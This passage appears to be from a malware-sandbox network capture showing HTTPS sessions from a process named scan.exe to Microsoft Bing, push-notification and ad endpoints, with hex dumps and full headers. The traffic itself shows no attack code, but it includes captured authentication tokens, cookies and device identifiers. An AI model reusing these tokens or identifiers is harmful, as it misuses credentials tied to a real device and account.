                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 9aa6a4ffa4722db5<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:18 UTC158OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 36 61 34 66 66 61 34 37 32 32 64 62 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: 9aa6a4ffa4722db5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:07:18 UTC158INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:18 UTC159INData Raw: 4d 53 2d 43 56 3a 20 47 43 57 70 76 34 66 39 51 30 71 65 30 51 51 6b 42 74 6f 58 4a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: GCWpv4f9Q0qe0QQkBtoXJQ.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.74977820.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:19 UTC159OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 61 38 39 39 38 64 34 61 36 30 66 32 31 37 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: daa8998d4a60f217
                                                                                                          2022-08-13 07:07:19 UTC159OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:19 UTC159OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 61 38 39 39 38 64 34 61 36 30 66 32 31 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: daa8998d4a60f217<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:19 UTC160OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 61 38 39 39 38 64 34 61 36 30 66 32 31 37 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: daa8998d4a60f217
                                                                                                          2022-08-13 07:07:19 UTC160INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:19 UTC160INData Raw: 4d 53 2d 43 56 3a 20 4d 59 6e 52 33 72 6c 4f 34 45 53 6d 33 45 61 68 7a 44 6a 74 67 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: MYnR3rlO4ESm3EahzDjtgQ.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.749776204.79.197.200443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:20 UTC160OUTGET /proactive/v2/spark?cc=US&setLang=en-US HTTP/1.1
                                                                                                          X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                          X-Search-SafeSearch: Moderate
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                          X-Device-IsBatteryCertified: false
                                                                                                          X-UserAgeClass: Unknown
                                                                                                          X-BM-Market: US
                                                                                                          X-BM-DateFormat: M/d/yyyy
                                                                                                          X-CortanaAccessAboveLock: false
                                                                                                          X-Device-OSSKU: 48
                                                                                                          X-Device-IsBatteryEnabled: false
                                                                                                          X-Device-NetworkType: ethernet
                                                                                                          X-BM-DTZ: -420
                                                                                                          X-BM-FirstEnabledTime: 132061395240662859
                                                                                                          X-DeviceID: 0100748C0900F661
                                                                                                          X-VoiceActivationOn: false
                                                                                                          X-Device-AudioCapture: Microphone (High Definition Audio Device)
                                                                                                          X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                          X-BM-Theme: 000000;0078d7
                                                                                                          X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3D
                                                                                                          X-Agent-DeviceId: 0100748C0900F661
                                                                                                          X-BM-CBT: 1660406776
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                          X-Device-isOptin: true
                                                                                                          Accept-language: en-US, en
                                                                                                          X-Device-IsEnergyHero: false
                                                                                                          X-Device-Touch: false
                                                                                                          X-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26
                                                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                          X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                          Host: www.bing.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
                                                                                                          2022-08-13 07:07:20 UTC162INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, must-revalidate, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 311
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: -1
                                                                                                          P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                          Set-Cookie: SUID=M; domain=.bing.com; expires=Sun, 14-Aug-2022 07:07:20 GMT; path=/; HttpOnly
                                                                                                          Set-Cookie: MUIDB=7E1F7E3AB9E24BF9AA0D8F6664CA6F63; expires=Thu, 07-Sep-2023 07:07:20 GMT; path=/; HttpOnly
                                                                                                          Set-Cookie: _EDGE_S=SID=03E457FE68406A6B3BEE460169EC6BD2&mkt=en-us&ui=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                                          Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHUID=V=2&GUID=D242929611EF49EBB37FC9D725237E63&dmnchg=1; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHUSR=DOB=20220813; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: ANON=A=AD8DAE85E20B2C5504CEBCE2FFFFFFFF; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/
                                                                                                          Set-Cookie: _SS=SID=03E457FE68406A6B3BEE460169EC6BD2; domain=.bing.com; path=/
                                                                                                          Set-Cookie: BM-Identity-Error=3002; domain=.bing.com; expires=Sat, 13-Aug-2022 07:12:20 GMT; path=/
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Search-ErrorInfo: Error:3002,Message:'FB ID missing'
                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          X-MSEdge-Ref: Ref A: FA4FB18308CA4862B3F5ECE17B936293 Ref B: FRA31EDGE0705 Ref C: 2022-08-13T07:07:20Z
                                                                                                          Date: Sat, 13 Aug 2022 07:07:19 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:20 UTC164INData Raw: 7b 22 42 61 73 65 50 61 67 65 22 3a 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 7d 2c 22 41 6e 73 77 65 72 73 22 3a 5b 5d 2c 22 43 6f 6e 66 69 67 22 3a 7b 22 50 72 65 66 65 74 63 68 49 6e 74 65 72 76 61 6c 22 3a 37 32 30 2c 22 42 61
                                                                                                          Data Ascii: {"BasePage":{"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}}},"Answers":[],"Config":{"PrefetchInterval":720,"Ba


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.749777204.79.197.200443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:20 UTC164OUTGET /client/config?cc=US&setlang=en-US HTTP/1.1
                                                                                                          X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                          X-Search-SafeSearch: Moderate
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                          X-UserAgeClass: Unknown
                                                                                                          X-BM-Market: US
                                                                                                          X-BM-DateFormat: M/d/yyyy
                                                                                                          X-CortanaAccessAboveLock: false
                                                                                                          X-Device-OSSKU: 48
                                                                                                          X-BM-DTZ: -420
                                                                                                          X-BM-FirstEnabledTime: 132061395240662859
                                                                                                          X-DeviceID: 0100748C0900F661
                                                                                                          X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                          X-BM-Theme: 000000;0078d7
                                                                                                          X-Search-RPSToken: t%3DEwDgAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAQu6GTFrNWvnx/6mkNZl7EYZBgAOAVvTU1YEGPx%2B9UmE25nRF6nASWESBppCXi/0FaDRJ77ZOkvmiByX0kY3/wFepGjPR9GcGu8UT2rwV6gj0IEOmLSbtJn4McGB1o4MVttpvOW9rGGK8oE63U78iYgrh2XPhLUR012oWM5tKmpQu2R1P6/QUWAop//HqG8hK2odcvrjXxF0mOUrYYXoz9zhWlkypEas%2BF7/nUrB8IWbgOe3uVzztfIHmx5naIkOwdo2OkgNP1ph/akMvcSPjLQvVWSkocaohVL9QAUvDpij1gZvhv0WaVG4Qmdd/%2Bi3/9KcHwZF6JVS1YVUeSzeyVUDZgAACAUexxILvs2wsAEio1PYwyKuG03er9lRLKaZn8brD4QoPqWJMdA41%2B3SWGiDu4vgv%2BTHDBD1WDtUU9twHyYt4DTa5i1BlEqlDb9t9%2BpkNOASQ6/Ur2o6y4QiyMQ0By07Y5FCJUHahAcqFsRrebed09beCE02JKc4GFSAelXc2IjGfuJ%2BSHPg4wXUjyco%2BOH32KuY3QPdtqjFMbwgJfg5cgGJlYslyB7izaJkNWQPiXXfunOxpHTQTkte5cP/eNXRBY4fodWXbxZcS6jJNMOWzejvqk6PZS6E5%2B40iCjlIZed3MTEpE37NjMTXbJetZyonLh44rMyOGoFQbPeafcG5A6BV0Vgf6jHddiJ/IcNUzJ/e5K1hAdwMS60SRAXwOxnIJHAXjRCDFQLIow%2BjUAP5GDMl1Nm77pdO8z%2BKwpWu7%2BojHn%2BZweEfdrXMww%2B9JT3jw7oJKu74brZVaEKAllotZZOR32EhwqFhLmgreM6elniCTLxaJi1kZPLPR1i8y9tnTZZncs8fPsmty4Hg%2BZGiLU9A49XBeAQ4yoks62OKkqbp6gbVZvJo/wB0BWJZOapZHrz%2BfcdfsQgZKbZAQ%3D%3D%26p%3D
                                                                                                          X-Agent-DeviceId: 0100748C0900F661
                                                                                                          X-BM-CBT: 1660406775
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                          X-Device-isOptin: true
                                                                                                          Accept-language: en-US, en
                                                                                                          X-Device-Touch: false
                                                                                                          X-Device-ClientSession: 3D03616141EB407B8D13A46D34A66D26
                                                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                          X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                          Host: www.bing.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cookie: MUID=7E1F7E3AB9E24BF9AA0D8F6664CA6F63
                                                                                                          2022-08-13 07:07:20 UTC167INHTTP/1.1 200 OK
                                                                                                          Cache-Control: private
                                                                                                          Content-Length: 2041
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                          Set-Cookie: SUID=M; domain=.bing.com; expires=Sun, 14-Aug-2022 07:07:20 GMT; path=/; HttpOnly
                                                                                                          Set-Cookie: MUIDB=7E1F7E3AB9E24BF9AA0D8F6664CA6F63; expires=Thu, 07-Sep-2023 07:07:20 GMT; path=/; HttpOnly
                                                                                                          Set-Cookie: _EDGE_S=SID=2BC2A378DC366E702A5DB287DDBD6F45&mkt=en-us&ui=en-us; domain=.bing.com; path=/; HttpOnly
                                                                                                          Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHUID=V=2&GUID=E1C915DB05D74690A34516E92970A1E8&dmnchg=1; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHUSR=DOB=20220813; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: ANON=A=AD8DAE85E20B2C5504CEBCE2FFFFFFFF; domain=.bing.com; expires=Tue, 13-Aug-2024 07:07:20 GMT; path=/
                                                                                                          Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/
                                                                                                          Set-Cookie: _SS=SID=2BC2A378DC366E702A5DB287DDBD6F45; domain=.bing.com; path=/
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          X-MSEdge-Ref: Ref A: 570ED2106D1943FCBF6DA1FFE7572AD3 Ref B: FRA31EDGE0505 Ref C: 2022-08-13T07:07:20Z
                                                                                                          Date: Sat, 13 Aug 2022 07:07:20 GMT
                                                                                                          Connection: close
                                                                                                          2022-08-13 07:07:20 UTC168INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                          Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value
                                                                                                          2022-08-13 07:07:20 UTC170INData Raw: 22 54 65 6d 70 6c 61 74 65 73 53 79 6e 63 49 6e 74 65 72 76 61 6c 22 3a 7b 22 76 61 6c 75 65 22 3a 31 34 34 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4d 61 78 52 65 6d 69 6e 64 65 72 43 6f 75 6e 74 22 3a 7b 22 76 61 6c 75 65 22 3a 32 35 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4d 61 78 52 65 74 72 79 43 6f 75 6e 74 22 3a 7b 22 76 61 6c 75 65 22 3a 32 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4c 6f 63 61 6c 4e 65 77 42 61 74 63 68 53 69 7a 65 22 3a 7b 22 76 61 6c 75 65 22 3a 31 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4d 61 78 41 74 74 61 63 68 6d 65 6e 74 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 7b 22 76 61 6c 75 65 22 3a 33 30 37 30 30 30 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 4c 6f 63 61 74 69 6f 6e 52 65 6d 69 6e
                                                                                                          Data Ascii: "TemplatesSyncInterval":{"value":1440,"feature":""},"MaxReminderCount":{"value":250,"feature":""},"MaxRetryCount":{"value":2,"feature":""},"LocalNewBatchSize":{"value":1,"feature":""},"MaxAttachmentSizeInBytes":{"value":307000,"feature":""},"LocationRemin


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          14192.168.2.74977920.82.210.154443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:26 UTC170OUTGET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:EE4890C5-90AE-59E2-5AC5-C20AA6654592&ctry=US&time=20220813T160713Z&lc=en-US&pl=en-US&idtp=mid&uid=d9fcfe42-b5d5-4629-ac66-c2605ea824c4&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dde0feed7425474480f129d9c69403b3&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1645681&metered=false&nettype=ethernet&npid=sc-280815&oemName=pyfehs%2C%20Inc.&oemid=pyfehs%2C%20Inc.&ossku=Professional&smBiosDm=pyfehs7%2C1&tl=2&tsu=1645681&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32220&sc=6
                                                                                                          X-SDK-HW-TOKEN: t=EwDgAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAeMOlGuVfwyuxfJAXV0g2yPRqivWt+Igxsp9rdCqLzLW+Yd/6rf+14/B4CiLIOwlrhIZlw3ElgEVbh6fvSbD9MD4pnZYNvgjbQYodtNmO9b3TQObvO9Ze3bFd5SqeGNuo38vQcpcj0ItHj9OemLgIRuGARq0VWVia3+LzpoCA22riTCH+DpYQ0VkP8M11juQbgV0lxWAGDRMfzwcTIG03vZKFINLEh65N6oWTA5FUITzLfhqHXko5bxMxtRe2DYSR6A8++voccy5y6hPGHXFc+bj7W9S8iTu5lgSp8DmhPAKvKkXKfRSyH8WJBwo/adHhGTLETHdkSKaTOBrLFZtmMUDZgAACG41ulcLcdC6sAGbZcX85UtZ6TKhnHDdIcRMo+1OkVxDs499MDh21nxQPnr8qtE8qSL0QllVS6+gqGYtAb7kf15hYgS29FLcMvjcm5Vuq9heOu0l7APLeS7dsxw5skAhGeBlCzbgp/Xezdo5dKLyaSTFdU35MpquJCGcs4IkkRfhzoe1pzb/D4O5awoJPgCsQMku1iq8MX277Vvum5T7+4Kj/rNPX/8S6v+g17teT3fnhHo5uVKd0N4dIFK5Hcly2/16VJBjcG1FdSAQH43HB7HAA4pvWZMYaCO9AvKFstd+5aDt/A5SEW8FLz9p3C7JDxmAyyrCAo6rUvf+XQE60v1S4IOFtziTcUi0jtUWJ1xEIiAgeQKtagKJe7qgcUhf+Hj/+N1bHKBz2d6Zi9p+1fEje0wHi/lIkRmgqEKMdB485EvuWuljOvusdCKoqwOW1YMOULmdT+qRJFIftfbf1z7jMzCAqx9G+WrcHsNcprJPth5zGqxhFK5kOy2AyoNKGJ9SjacT8Ejt8APCH5847PRqTZmVsSI6+wy1MEX87psvZUYjItMHJ7/Ree2kZsuDxDbS8Ibr11NBZa7ZAQ==&p=
                                                                                                          Cache-Control: no-cache
                                                                                                          MS-CV: 2nJdRnC0TEiwNFBi.0
                                                                                                          User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                          X-SDK-HWF: tch0,m301,m751,mA01,mT01
                                                                                                          Host: arc.msn.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2022-08-13 07:07:26 UTC174INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Length: 3047
                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                          Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T700333390-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"256"}]
                                                                                                          X-ARC-SIG: dPeHB/0EODpbNKEeKU+6dSXlVNYR2qoi4ovpyyel3hL7+LyNoNeV6OMrKSvpC1s+yJDuYLy5gs88nzQGQa+5eGlhysgxLoxcrOxmzVB7JOp4CVzS3goZgiuUkecg7x+zvpHSQPksW7ouumvNWGmx8NtF/6KaFM8P8fuZV3XS+yP3wWGnOgGnBnNrhKzic1l9wnP8OaFOy0NUIiJxotSx3Mjj6pnhLutBHw89C3dfDZamiQlSZySXplsGUkCAPMY1de7nwncSUdnV05Fy3aEDB5wQJW+t/BXZLagywybGmQh/1y+VI0XFnUfNJzoC/zdjM8SRV2aLcSUXRYEEWlegJQ==
